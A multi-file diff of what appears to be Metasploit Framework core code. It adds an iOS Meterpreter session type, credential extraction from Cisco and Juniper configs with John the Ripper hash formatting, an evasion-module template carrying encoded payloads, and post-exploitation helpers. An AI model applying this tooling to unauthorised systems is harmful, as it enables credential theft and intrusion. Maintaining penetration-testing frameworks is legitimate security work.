@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_armle_Apple_iOS < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'apple_ios'
+    self.base_arch = ARCH_ARMLE
+  end
+end
+
+end
+end
+
@@ -71,6 +71,14 @@ module Msf
          opts[:name] ||= ds['PayloadProcessCommandLine']
        end

+        if ds['RemoteMeterpreterDebugFile'] != ''
+          opts[:log_file] ||= ds['RemoteMeterpreterDebugFile']
+        end
+
+        log_level = ds['MeterpreterDebugLevel'].to_i
+        log_level = 0 if log_level < 0
+        log_level = 3 if log_level > 3
+        opts[:debug] = log_level
        opts[:uuid] ||= generate_payload_uuid

        case opts[:scheme]
@@ -55,9 +55,24 @@ module Auxiliary::Cisco

    tuniface = nil

+    host_info = {
+      :host => thost,
+      :os_name => 'Cisco IOS',
+    }
+    report_host(host_info)
+
    config.each_line do |line|
      case line
 #
+# Cover host details
+#
+        when /^version (\d\d\.\d)/i
+          host_info[:os_flavor] = $1.to_s
+          report_host(host_info)
+        when /^hostname (\S+)/i
+          host_info[:name] = $1.to_s
+          report_host(host_info)
+#
 # Enable passwords
 #
        when /^\s*enable (password|secret) (\d+) (.*)/i
@@ -68,18 +83,19 @@ module Auxiliary::Cisco
            print_good("#{thost}:#{tport} MD5 Encrypted Enable Password: #{shash}")
            store_loot("cisco.ios.enable_hash", "text/plain", thost, shash, "enable_password_hash.txt", "Cisco IOS Enable Password Hash (MD5)")
            cred = credential_data.dup
+            cred[:jtr_format] = 'md5'
            cred[:private_data] = shash
            cred[:private_type] = :nonreplayable_hash
            create_credential_and_login(cred)
          end

-          if stype == 0
+          if stype == 0 #unencrypted
            print_good("#{thost}:#{tport} Enable Password: #{shash}")
            store_loot("cisco.ios.enable_pass", "text/plain", thost, shash, "enable_password.txt", "Cisco IOS Enable Password")

            cred = credential_data.dup
            cred[:private_data] = shash
-            cred[:private_type] = :nonreplayable_hash
+            cred[:private_type] = :password
            create_credential_and_login(cred)

          end
@@ -101,7 +117,7 @@ module Auxiliary::Cisco

          cred = credential_data.dup
          cred[:private_data] = spass
-          cred[:private_type] = :nonreplayable_hash
+          cred[:private_type] = :password
          create_credential_and_login(cred)

 #
@@ -144,6 +160,7 @@ module Auxiliary::Cisco
          store_loot("cisco.ios.vty_password", "text/plain", thost, shash, "vty_password_hash.txt", "Cisco IOS VTY Password Hash (MD5)")

          cred = credential_data.dup
+          cred[:jtr_format] = 'md5'
          cred[:private_data] = shash
          cred[:private_type] = :nonreplayable_hash
          create_credential_and_login(cred)
@@ -154,7 +171,7 @@ module Auxiliary::Cisco

          cred = credential_data.dup
          cred[:private_data] = spass
-          cred[:private_type] = :nonreplayable_hash
+          cred[:private_type] = :password
          create_credential_and_login(cred)

 #
@@ -174,6 +191,7 @@ module Auxiliary::Cisco
            print_good("#{thost}:#{tport} Wireless WPA-PSK MD5 Password Hash: #{spass}")
            store_loot("cisco.ios.wireless_wpapsk_hash", "text/plain", thost, spass, "wireless_wpapsk_hash.txt", "Cisco IOS Wireless WPA-PSK Password Hash (MD5)")
            cred = credential_data.dup
+            cred[:jtr_format] = 'md5'
            cred[:private_data] = spass
            cred[:private_type] = :nonreplayable_hash
            create_credential_and_login(cred)
@@ -184,7 +202,7 @@ module Auxiliary::Cisco
            store_loot("cisco.ios.wireless_wpapsk", "text/plain", thost, spass, "wireless_wpapsk.txt", "Cisco IOS Wireless WPA-PSK Password")
            cred = credential_data.dup
            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
+            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

@@ -254,6 +272,7 @@ module Auxiliary::Cisco
            print_good("#{thost}:#{tport} Username '#{user}' with MD5 Encrypted Password: #{spass}")
            store_loot("cisco.ios.username_password_hash", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password_hash.txt", "Cisco IOS Username and Password Hash (MD5)")
            cred = credential_data.dup
+            cred[:jtr_format] = 'md5'
            cred[:private_data] = spass
            cred[:private_type] = :nonreplayable_hash
            create_credential_and_login(cred)
@@ -265,7 +284,7 @@ module Auxiliary::Cisco

            cred = credential_data.dup
            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
+            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

@@ -291,7 +310,7 @@ module Auxiliary::Cisco
          store_loot("cisco.ios.ephone.username_password", "text/plain", thost, "#{user}:#{spass}", "ephone_username_password.txt", "Cisco IOS ephone Username and Password")
          cred = credential_data.dup
          cred[:private_data] = spass
-          cred[:private_type] = :nonreplayable_hash
+          cred[:private_type] = :password
          create_credential_and_login(cred)

        when /^\s*username ([^\s]+) (secret|password) (\d+) ([^\s]+)/i
@@ -303,6 +322,7 @@ module Auxiliary::Cisco
            print_good("#{thost}:#{tport} Username '#{user}' with MD5 Encrypted Password: #{spass}")
            store_loot("cisco.ios.username_password_hash", "text/plain", thost, "#{user}:#{spass}", "username_password_hash.txt", "Cisco IOS Username and Password Hash (MD5)")
            cred = credential_data.dup
+            cred[:jtr_format] = 'md5'
            cred[:private_data] = spass
            cred[:private_type] = :nonreplayable_hash
            create_credential_and_login(cred)
@@ -314,7 +334,7 @@ module Auxiliary::Cisco

            cred = credential_data.dup
            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
+            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

@@ -340,6 +360,7 @@ module Auxiliary::Cisco
            store_loot("cisco.ios.ppp_username_password_hash", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password_hash.txt", "Cisco IOS PPP Username and Password Hash (MD5)")

            cred = credential_data.dup
+            cred[:jtr_format] = 'md5'
            cred[:private_data] = spass
            cred[:private_type] = :nonreplayable_hash
            create_credential_and_login(cred)
@@ -351,7 +372,7 @@ module Auxiliary::Cisco

            cred = credential_data.dup
            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
+            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

@@ -374,6 +395,7 @@ module Auxiliary::Cisco
            print_good("#{thost}:#{tport} PPP CHAP MD5 Encrypted Password: #{spass}")
            store_loot("cisco.ios.ppp_password_hash", "text/plain", thost, spass, "ppp_password_hash.txt", "Cisco IOS PPP Password Hash (MD5)")
            cred = credential_data.dup
+            cred[:jtr_format] = 'md5'
            cred[:private_data] = spass
            cred[:private_type] = :nonreplayable_hash
            create_credential_and_login(cred)
@@ -385,7 +407,7 @@ module Auxiliary::Cisco

            cred = credential_data.dup
            cred[:private_data] = spass
-            cred[:private_type] = :nonreplayable_hash
+            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

@@ -27,7 +27,7 @@ module Auxiliary::JohnTheRipper
      [
        OptPath.new('CONFIG',               [false, 'The path to a John config file to use instead of the default']),
        OptPath.new('CUSTOM_WORDLIST',      [false, 'The path to an optional custom wordlist']),
-        OptInt.new('ITERATION_TIMOUT',      [false, 'The max-run-time for each iteration of cracking']),
+        OptInt.new('ITERATION_TIMEOUT',     [false, 'The max-run-time for each iteration of cracking']),
        OptPath.new('JOHN_PATH',            [false, 'The absolute path to the John the Ripper executable']),
        OptBool.new('KORELOGIC',            [false, 'Apply the KoreLogic rules to Wordlist Mode(slower)', false]),
        OptBool.new('MUTATE',               [false, 'Apply common mutations to the Wordlist (SLOW)', false]),
@@ -97,5 +97,69 @@ module Auxiliary::JohnTheRipper
    wordlist.to_file(max_len)
  end

+  # This method takes a {framework.db.cred}, and normalizes it
+  # to the string format JTR is expecting.
+  #
+  # @param [credClass] a credential from framework.db
+  # @return [String] the hash in jtr format or nil on no mach
+  def hash_to_jtr(cred)
+    case cred.private.type
+    when 'Metasploit::Credential::NTLMHash'
+      return "#{cred.public.username}:#{cred.id}:#{cred.private.data}:::#{cred.id}"
+    when 'Metasploit::Credential::PostgresMD5'
+      if cred.private.jtr_format =~ /postgres|raw-md5/
+        # john --list=subformats | grep 'PostgreSQL MD5'
+        #UserFormat = dynamic_1034  type = dynamic_1034: md5($p.$u) (PostgreSQL MD5)
+        hash_string = cred.private.data
+        hash_string.gsub!(/^md5/, '')
+        return "#{cred.public.username}:$dynamic_1034$#{hash_string}"
+      end
+    when 'Metasploit::Credential::NonreplayableHash'
+      case cred.private.jtr_format
+        # oracle 11+ password hash descriptions:
+        # this password is stored as a long ascii string with several sections
+        # https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/
+        # example:
+        # hash = []
+        # hash << "S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;"
+        # hash << "H:DC9894A01797D91D92ECA1DA66242209;"
+        # hash << "T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C"
+        # puts hash.join('')
+        # S: = 60 characters -> sha1(password + salt (10 bytes))
+        #         40 char sha1, 20 char salt
+        #         hash is 8F2D65FB5547B71C8DA3760F10960428CD307B1C
+        #         salt is 6271691FC55C1F56554A
+        # H: = 32 characters
+        #         legacy MD5
+        # T: = 160 characters
+        #         PBKDF2-based SHA512 hash specific to 12C (12.1.0.2+)
+      when /raw-sha1|oracle11/ # oracle 11
+        if cred.private.data =~ /S:([\dA-F]{60})/ # oracle 11
+          return "#{cred.public.username}:#{$1}:#{cred.id}:"
+        end
+      when /oracle12c/
+        if cred.private.data =~ /T:([\dA-F]{160})/ # oracle 12c
+          return "#{cred.public.username}:$oracle12c$#{$1.downcase}:#{cred.id}:"
+        end
+      when /dynamic_1506/
+        if cred.private.data =~ /H:([\dA-F]{32})/ # oracle 11
+          return "#{cred.public.username.upcase}:$dynamic_1506$#{$1}:#{cred.id}:"
+        end
+      when /oracle/ # oracle
+        if cred.private.jtr_format.start_with?('des') # 'des,oracle', not oracle11/12c
+          return "#{cred.public.username}:O$#{cred.public.username}##{cred.private.data}:#{cred.id}:"
+        end
+      when /md5|des|bsdi|crypt|bf/
+        # md5(crypt), des(crypt), b(crypt)
+        return "#{cred.public.username}:#{cred.private.data}:::::#{cred.id}:"
+      else
+        # /mysql|mysql-sha1/
+        # /mssql|mssql05|mssql12/
+        # /des(crypt)/
+        return "#{cred.public.username}:#{cred.private.data}:#{cred.id}:"
+      end
+    end
+    nil
+  end
 end
 end
@@ -60,6 +60,7 @@ module Auxiliary::Juniper
      print_good("User #{user_uid} named #{user_name} found with password hash #{user_hash}. Enable permission: #{user_enable}")
      cred = credential_data.dup
      cred[:username] = user_name
+      cred[:jtr_format] = 'sha1'
      cred[:private_data] = user_hash
      cred[:private_type] = :nonreplayable_hash
      create_credential_and_login(cred)
@@ -139,16 +140,28 @@ module Auxiliary::Juniper
      status: Metasploit::Model::Login::Status::UNTRIED
    }

-    store_loot('juniper.netscreen.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper Netscreen Configuration')
+    store_loot('juniper.junos.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper Netscreen Configuration')

    # we'll take out the pretty format so its easier to regex
    config = config.split("\n").join('')

    if /root-authentication[\s]+\{[\s]+encrypted-password "(?<root_hash>[^"]+)";/i =~ config
      root_hash = root_hash.strip
+      case
+        when root_hash.start_with?('$1$')
+          jtr_format = 'md5'
+        when root_hash.start_with?('$5$')
+          jtr_format = 'sha256,crypt'
+        when root_hash.start_with?('$6$')
+          jtr_format = 'sha512,crypt'
+        else
+          jtr_format = ''
+      end
+
      print_good("root password hash: #{root_hash}")
      cred = credential_data.dup
      cred[:username] = 'root'
+      cred[:jtr_format] = jtr_format
      cred[:private_data] = root_hash
      cred[:private_type] = :nonreplayable_hash
      create_credential_and_login(cred)
@@ -160,9 +173,20 @@ module Auxiliary::Juniper
      user_uid  = result[1].strip
      user_permission = result[2].strip
      user_hash = result[3].strip
+      case
+        when user_hash.start_with?('$1$')
+          jtr_format = 'md5'
+        when user_hash.start_with?('$5$')
+          jtr_format = 'sha256,crypt'
+        when user_hash.start_with?('$6$')
+          jtr_format = 'sha512,crypt'
+        else
+          jtr_format = ''
+      end
      print_good("User #{user_uid} named #{user_name} in group #{user_permission} found with password hash #{user_hash}.")
      cred = credential_data.dup
      cred[:username] = user_name
+      cred[:jtr_format] = jtr_format
      cred[:private_data] = user_hash
      cred[:private_type] = :nonreplayable_hash
      create_credential_and_login(cred)
@@ -10,18 +10,18 @@ module Msf::DBManager::Loot
  # This methods returns a list of all loot in the database
  #
  def loots(opts)
-    data = opts.delete(:data)
-    # Remove path from search conditions as this won't accommodate remote data
-    # service usage where the client and server storage locations differ.
-    opts.delete(:path)
-    search_term = opts.delete(:search_term)
-
    ::ActiveRecord::Base.connection_pool.with_connection {
      # If we have the ID, there is no point in creating a complex query.
      if opts[:id] && !opts[:id].to_s.empty?
        return Array.wrap(Mdm::Loot.find(opts[:id]))
      end

+      # Remove path from search conditions as this won't accommodate remote data
+      # service usage where the client and server storage locations differ.
+      opts.delete(:path)
+      search_term = opts.delete(:search_term)
+      data = opts.delete(:data)
+
      wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
      opts[:workspace_id] = wspace.id

@@ -99,10 +99,19 @@ module Msf::DBManager::Loot
  def update_loot(opts)
    ::ActiveRecord::Base.connection_pool.with_connection {
      wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
+      # Prevent changing the data field to ensure the file contents remain the same as what was originally looted.
+      raise ArgumentError, "Updating the data attribute is not permitted." if opts[:data]
      opts[:workspace] = wspace if wspace

      id = opts.delete(:id)
      loot = Mdm::Loot.find(id)
+
+      # If the user updates the path attribute (or filename) we need to update the file
+      # on disk to reflect that.
+      if opts[:path] && File.exists?(loot.path)
+        File.rename(loot.path, opts[:path])
+      end
+
      loot.update!(opts)
      return loot
    }
@@ -147,7 +147,6 @@ module Msf::DBManager::ModuleCache
  # This provides a standard set of search filters for every module.
  #
  # Supported keywords with the format <keyword>:<search_value>:
-  # +app+:: If +client+ then matches +'passive'+ stance modules, otherwise matches +'active' stance modules.
  # +author+:: Matches modules with the given author email or name.
  # +bid+:: Matches modules with the given Bugtraq ID.
  # +cve+:: Matches modules with the given CVE ID.
@@ -204,7 +203,6 @@ module Msf::DBManager::ModuleCache
      @names    = Set.new
      @os       = Set.new
      @refs     = Set.new
-      @stances  = Set.new
      @text     = Set.new
      @types    = Set.new

@@ -212,15 +210,6 @@ module Msf::DBManager::ModuleCache
        formatted_values = match_values(value_set)

        case keyword
-          when 'app'
-            formatted_values = value_set.collect { |value|
-              formatted_value = 'aggressive'
-              if value == 'client'
-                formatted_value = 'passive'
-              end
-              formatted_value
-            }
-            @stances << formatted_values
          when 'arch'
            @archs << formatted_values
          when 'author'
@@ -251,7 +240,6 @@ module Msf::DBManager::ModuleCache
    @query = @query.module_os_or_platform(  @os.to_a.flatten      ) if @os.any?
    @query = @query.module_text(            @text.to_a.flatten    ) if @text.any?
    @query = @query.module_type(            @types.to_a.flatten   ) if @types.any?
-    @query = @query.module_stance(          @stances.to_a.flatten ) if @stances.any?
    @query = @query.module_ref(             @refs.to_a.flatten    ) if @refs.any?

    @query.uniq
@@ -42,8 +42,6 @@ module Msf::Module::Search
    k = res

    refs = self.references.map{|x| [x.ctx_id, x.ctx_val].join("-") }
-    is_server    = (self.respond_to?(:stance) and self.stance == "aggressive")
-    is_client    = (self.respond_to?(:stance) and self.stance == "passive")

    [0,1].each do |mode|
      match = false
@@ -79,9 +77,6 @@ module Msf::Module::Search
              match = [t,w] if self.datastore['RPORT'].to_s =~ r
            when 'type'
              match = [t,w] if Msf::MODULE_TYPES.any? { |modt| w == modt and self.type == modt }
-            when 'app'
-              match = [t,w] if (w == "server" and is_server)
-              match = [t,w] if (w == "client" and is_client)
            when 'cve'
              match = [t,w] if refs.any? { |ref| ref =~ /^cve\-/i and ref =~ r }
            when 'bid'
@@ -104,4 +99,4 @@ module Msf::Module::Search

    false
  end
-end
+end
@@ -20,6 +20,8 @@ class Msf::Modules::External::Shim
      single_host_login_scanner(mod)
    when 'multi_scanner'
      multi_scanner(mod)
+    when 'evasion'
+      evasion(mod)
    else
      nil
    end
@@ -39,20 +41,36 @@ class Msf::Modules::External::Shim
  end

  def self.mod_meta_common(mod, meta = {}, ignore_options: [])
-    meta[:path]        = mod.path.dump
-    meta[:name]        = mod.meta['name'].dump
-    meta[:description] = mod.meta['description'].dump
-    meta[:authors]     = mod.meta['authors'].map(&:dump).join(",\n          ")
-    meta[:license]     = mod.meta['license'].nil? ? 'MSF_LICENSE' : mod.meta['license']
+    meta[:path]             = mod.path.dump
+    meta[:name]             = mod.meta['name'].dump
+    meta[:description]      = mod.meta['description'].dump
+    meta[:authors]          = mod.meta['authors'].map(&:dump).join(",\n          ")
+    meta[:license]          = mod.meta['license'].nil? ? 'MSF_LICENSE' : mod.meta['license']
+    meta[:options]          = mod_meta_common_options(mod, ignore_options: ignore_options)
+    meta[:advanced_options] = mod_meta_common_options(mod, ignore_options: ignore_options, advanced: true)
+    meta[:capabilities]     = mod.meta['capabilities']
+    meta[:notes]            = transform_notes(mod.meta['notes'])

+    if mod.meta['describe_payload_options'].nil?
+      mod.meta['describe_payload_options'] = {}
+    end
+    meta[:default_options]  = mod.meta['describe_payload_options'].map do |name, value|
+      "#{name.dump} => #{value.inspect}"
+    end.join(",\n          ")
+
+    meta
+  end
+
+  def self.mod_meta_common_options(mod, ignore_options: [], advanced: false)
    # Set modules without options to have an empty map
    if mod.meta['options'].nil?
      mod.meta['options'] = {}
    end

-    options = mod.meta['options'].reject {|n, _| ignore_options.include? n}
+    options = mod.meta['options'].map do |n, o|
+      next if ignore_options.include? n
+      next unless o.fetch('advanced', false) == advanced

-    meta[:options]     = options.map do |n, o|
      if o['values']
        "Opt#{o['type'].camelize}.new(#{n.dump},
          [#{o['required']}, #{o['description'].dump}, #{o['default'].inspect}, #{o['values'].inspect}])"
@@ -60,11 +78,9 @@ class Msf::Modules::External::Shim
        "Opt#{o['type'].camelize}.new(#{n.dump},
          [#{o['required']}, #{o['description'].dump}, #{o['default'].inspect}])"
      end
-    end.join(",\n          ")
-
-    meta[:capabilities] = mod.meta['capabilities']
-    meta[:notes] = transform_notes(mod.meta['notes'])
-    meta
+    end
+    options.reject! { |o| o.nil? }
+    options.join(",\n          ")
  end

  def self.mod_meta_exploit(mod, meta = {})
@@ -144,6 +160,27 @@ class Msf::Modules::External::Shim
    render_template('dos.erb', meta)
  end

+  def self.evasion(mod)
+    meta = mod_meta_common(mod, ignore_options: ['payload_raw', 'payload_encoded', 'target'])
+    meta[:platform]    = mod.meta['targets'].map do |t|
+      t['platform'].dump
+    end.uniq.join(",\n          ")
+    meta[:arch]        = mod.meta['targets'].map do |t|
+      t['arch'].dump
+    end.uniq.join(",\n          ")
+    meta[:references]  = mod.meta['references'].map do |r|
+      "[#{r['type'].upcase.dump}, #{r['ref'].dump}]"
+    end.join(",\n          ")
+    meta[:targets]     = mod.meta['targets'].map do |t|
+      if t['name']
+        "[#{t['name'].dump}, {'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]"
+      else
+        "[#{t['platform'].dump} + ' ' + #{t['arch'].dump}, {'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]"
+      end
+    end.join(",\n          ")
+    render_template('evasion.erb', meta)
+  end
+
  #
  # In case certain notes are not properly capitalized in the external module definition,
  # ensure that they are properly capitalized before rendering.
@@ -0,0 +1,45 @@
+require 'msf/core/modules/external/bridge'
+require 'msf/core/module/external'
+
+class MetasploitModule < Msf::Evasion
+  include Msf::Module::External
+
+  def initialize
+    super({
+    <%= common_metadata meta %>
+      'References'      =>
+        [
+          <%= meta[:references] %>
+        ],
+      'Platform'        => [<%= meta[:platform] %>],
+      'Arch'            => [<%= meta[:arch] %>],
+      'Targets'         =>
+        [
+          <%= meta[:targets] %>
+        ],
+      'DefaultOptions' =>
+        {
+          <%= meta[:default_options] %>
+        }
+      })
+
+      register_options([
+        <%= meta[:options] %>
+      ])
+
+      register_advanced_options([
+        <%= meta[:advanced_options] %>
+      ])
+  end
+
+  def run
+    args = datastore.to_h.merge(
+      # XXX: JSON-RPC requires UTF-8, so we Base64-encode the binary payload
+      payload_encoded: Rex::Text.encode_base64(payload.encoded),
+      payload_raw: Rex::Text.encode_base64(payload.raw),
+      target: target.name
+    )
+
+    execute_module(<%= meta[:path] %>, args: args)
+  end
+end
@@ -18,7 +18,8 @@ module Msf::Modules::Metadata::Maps
    mservs = {}

    get_metadata.each do |exploit|
-      next unless exploit.type == "exploit" && exploit.is_server
+      # expand this in future to be more specific about remote exploits.
+      next unless exploit.type == "exploit"
      fullname = exploit.full_name
      exploit.references.each do |reference|
        next if reference =~ /^URL/
@@ -26,10 +26,6 @@ class Obj
  # @return [Array<String>]
  attr_reader :references
  # @return [Boolean]
-  attr_reader :is_server
-  # @return [Boolean]
-  attr_reader :is_client
-  # @return [String]
  attr_reader :platform
  # @return [String]
  attr_reader :arch
@@ -70,8 +66,6 @@ class Obj
    @description        = module_instance.description.to_s.strip
    @author             = module_instance.author.map{|x| x.to_s}
    @references         = module_instance.references.map{|x| [x.ctx_id, x.ctx_val].join("-") }
-    @is_server          = (module_instance.respond_to?(:stance) and module_instance.stance == "aggressive")
-    @is_client          = (module_instance.respond_to?(:stance) and module_instance.stance == "passive")
    @post_auth          = module_instance.post_auth?
    @default_credential = module_instance.default_cred?

@@ -123,8 +117,6 @@ class Obj
      'author'             => @author,
      'description'        => @description,
      'references'         => @references,
-      'is_server'          => @is_server,
-      'is_client'          => @is_client,
      'platform'           => @platform,
      'arch'               => @arch,
      'rport'              => @rport,
@@ -174,8 +166,6 @@ class Obj
    @description        = obj_hash['description']
    @author             = obj_hash['author'].nil? ? [] : obj_hash['author']
    @references         = obj_hash['references']
-    @is_server          = obj_hash['is_server']
-    @is_client          = obj_hash['is_client']
    @platform           = obj_hash['platform']
    @arch               = obj_hash['arch']
    @rport              = obj_hash['rport']
@@ -6,7 +6,7 @@ require 'msf/core/modules/metadata'
 module Msf::Modules::Metadata::Search

  VALID_PARAMS =
-      %w[aka app author authors arch cve bid edb check date disclosure_date description full_name fullname mod_time
+      %w[aka author authors arch cve bid edb check date disclosure_date description full_name fullname mod_time
      name os platform path port rport rank ref ref_name reference references target targets text type]

  #
@@ -49,9 +49,6 @@ module Msf::Modules::Metadata::Search
          case keyword
            when 'aka'
              match = [keyword, search_term] if (module_metadata.notes['AKA'] || []).any? { |aka| aka =~ regex }
-            when 'app'
-              match = [keyword, search_term] if (search_term == "server" and module_metadata.is_server)
-              match = [keyword, search_term] if (search_term == "client" and module_metadata.is_client)
            when 'author', 'authors'
              match = [keyword, search_term] if module_metadata.author.any? { |author| author =~ regex }
            when 'arch'
@@ -82,6 +82,20 @@ module Msf::Payload::Linux
            "false"
          ]
        ),
+        Msf::OptInt.new('MeterpreterDebugLevel',
+          [
+            true,
+            "Set debug level for meterpreter 0-3 (Default output is strerr)",
+            0
+          ]
+        ),
+        Msf::OptString.new('RemoteMeterpreterDebugFile',
+          [
+            false,
+            "Redirect Debug Info to a Log File",
+            ""
+          ]
+        ),
      ], Msf::Payload::Linux)

    ret
@@ -0,0 +1,62 @@
+# -*- coding: binary -*-
+require 'msf/core'
+require 'macho'
+
+class Msf::Payload::MachO
+
+  def initialize(data)
+    @macho = MachO::MachOFile.new_from_bin(data)
+  end
+
+  def entrypoint
+    main_func = @macho[:LC_MAIN].first
+    main_func.entryoff
+  end
+
+  #
+  # Return the VM respresentation of a macho file
+  #
+  def flatten
+    raw_data = @macho.serialize
+    min = -1
+    max = 0
+    for segment in @macho.segments
+      next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO]
+      if min == -1 or min > segment.vmaddr
+        min = segment.vmaddr
+      end
+      if max < segment.vmaddr + segment.vmsize
+        max = segment.vmaddr + segment.vmsize
+      end
+    end
+
+    output_data = "\x00" * (max - min)
+    for segment in @macho.segments
+      for section in segment.sections
+        flat_addr = section.addr - min
+        section_data = raw_data[section.offset, section.size]
+        if section_data
+          output_data[flat_addr, section_data.size] = section_data
+        end
+      end
+    end
+
+    output_data
+  end
+
+  def to_dylib(name)
+    new_lc = MachO::LoadCommands::LoadCommand.create(:LC_ID_DYLIB, "@executable_path/#{name}.dylib", 0, 0, 0)
+    @macho.add_command(new_lc)
+
+    raw_data = @macho.serialize
+    raw_data[12] = MachO::Headers::MH_DYLIB.chr
+    raw_data[36,7] = "__ZERO\x00"
+    raw_data
+  end
+
+  def raw
+    @macho.serialize
+  end
+
+end
+
@@ -235,6 +235,20 @@ module Msf::Post::Common
    nil
  end

-  private
+  #
+  # Checks if the `cmd` is installed on the system
+  # @return [Boolean]
+  #
+  def command_exists?(cmd)
+    if session.platform == 'windows'
+      # https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/where_1
+      # https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/if
+      cmd_exec("cmd /c where /q #{cmd} & if not errorlevel 1 echo true").to_s.include? 'true'
+    else
+      cmd_exec("command -v #{cmd} && echo true").to_s.include? 'true'
+    end
+  rescue
+    raise "Unable to check if command `#{cmd}' exists"
+  end

 end
@@ -166,6 +166,19 @@ module Msf::Post::File
    cmd_exec("test -w '#{path}' && echo true").to_s.include? 'true'
  end

+  #
+  # See if +path+ on the remote system exists and is readable
+  #
+  # @param path [String] Remote path to check
+  #
+  # @return [Boolean] true if +path+ exists and is readable
+  #
+  def readable?(path)
+    raise "`readable?' method does not support Windows systems" if session.platform == 'windows'
+
+    cmd_exec("test -r '#{path}' && echo true").to_s.include? 'true'
+  end
+
  #
  # Check for existence of +path+ on the remote file system
  #
@@ -318,6 +331,8 @@ module Msf::Post::File
      return session.shell_command_token("type \"#{file_name}\"")
    end

+    return nil unless readable?(file_name)
+
    if command_exists?('cat')
      return session.shell_command_token("cat \"#{file_name}\"")
    end
@@ -225,16 +225,6 @@ module System
    raise 'Unable to check for gcc'
  end

-  #
-  # Checks if the `cmd` is installed on the system
-  # @return [Boolean]
-  #
-  def command_exists?(cmd)
-    cmd_exec("command -v #{cmd} && echo true").to_s.include? 'true'
-  rescue
-    raise "Unable to check if command `#{cmd}` exists"
-  end
-
  #
  # Gets the process id(s) of `program`
  # @return [Array]
@@ -118,16 +118,6 @@ module System
    raise 'Unable to check for gcc'
  end

-  #
-  # Checks if the `cmd` is installed on the system
-  # @return [Boolean]
-  #
-  def command_exists?(cmd)
-    cmd_exec("command -v #{cmd} && echo true").to_s.include? 'true'
-  rescue
-    raise "Unable to check if command `#{cmd}` exists"
-  end
-
  #
  # Gets the process id(s) of `program`
  # @return [Array]
@@ -30,9 +30,8 @@ module HostServlet
      begin
        sanitized_params = sanitize_params(params, env['rack.request.query_hash'])
        data = get_db.hosts(sanitized_params)
-        includes = [:loots]
        data = data.first if is_single_object?(data, sanitized_params)
-        set_json_data_response(response: data, includes: includes)
+        set_json_data_response(response: data)
      rescue => e
        print_error_and_create_response(error: e, message: 'There was an error retrieving hosts:', code: 500)
      end
@@ -26,9 +26,7 @@ module LootServlet
        sanitized_params = sanitize_params(params, env['rack.request.query_hash'])
        data = get_db.loots(sanitized_params)
        includes = [:host]
-        data.each do |loot|
-          loot.data = Base64.urlsafe_encode64(loot.data) if loot.data
-        end
+        data = encode_loot_data(data)
        data = data.first if is_single_object?(data, sanitized_params)
        set_json_data_response(response: data, includes: includes)
      rescue => e
@@ -43,12 +41,13 @@ module LootServlet
      job = lambda { |opts|
        if opts[:data]
          filename = File.basename(opts[:path])
-          local_path = File.join(Msf::Config.loot_directory, filename)
+          local_path = File.join(Msf::Config.loot_directory, "#{SecureRandom.hex(10)}-#{filename}")
          opts[:path] = process_file(opts[:data], local_path)
          opts[:data] = Base64.urlsafe_decode64(opts[:data])
        end

-        get_db.report_loot(opts)
+        data = get_db.report_loot(opts)
+        encode_loot_data(data)
      }
      exec_report_job(request, &job)
    }
@@ -61,7 +60,16 @@ module LootServlet
        opts = parse_json_request(request, false)
        tmp_params = sanitize_params(params)
        opts[:id] = tmp_params[:id] if tmp_params[:id]
+        db_record = get_db.loots(opts).first
+        # Give the file a unique name to prevent accidental overwrites. Only do this if there is actually a file
+        # on disk. If there is not a file on disk we assume that this DB record is for tracking a file outside
+        # of metasploit, so we don't want to assign them a unique file name and overwrite that.
+        if opts[:path] && File.exists?(db_record.path)
+          filename = File.basename(opts[:path])
+          opts[:path] = File.join(Msf::Config.loot_directory, "#{SecureRandom.hex(10)}-#{filename}")
+        end
        data = get_db.update_loot(opts)
+        data = encode_loot_data(data)
        set_json_data_response(response: data)
      rescue => e
        print_error_and_create_response(error: e, message: 'There was an error updating the loot:', code: 500)
@@ -75,6 +83,10 @@ module LootServlet
      begin
        opts = parse_json_request(request, false)
        data = get_db.delete_loot(opts)
+        # The rails delete operation returns a frozen object. We need to Base64 encode the data
+        # before converting to JSON. So we'll work with a duplicate of the original if it is frozen.
+        data.map! { |loot| loot.dup if loot.frozen? }
+        data = encode_loot_data(data)
        set_json_data_response(response: data)
      rescue => e
        print_error_and_create_response(error: e, message: 'There was an error deleting the loot:', code: 500)
@@ -131,6 +131,13 @@ module ServletHelper
    response
  end

+  def encode_loot_data(data)
+    Array.wrap(data).each do |loot|
+      loot.data = Base64.urlsafe_encode64(loot.data) if loot.data && !loot.data.empty?
+    end
+    data
+  end
+
  # Get Warden::Proxy object from the Rack environment.
  # @return [Warden::Proxy] The Warden::Proxy object from the Rack environment.
  def warden
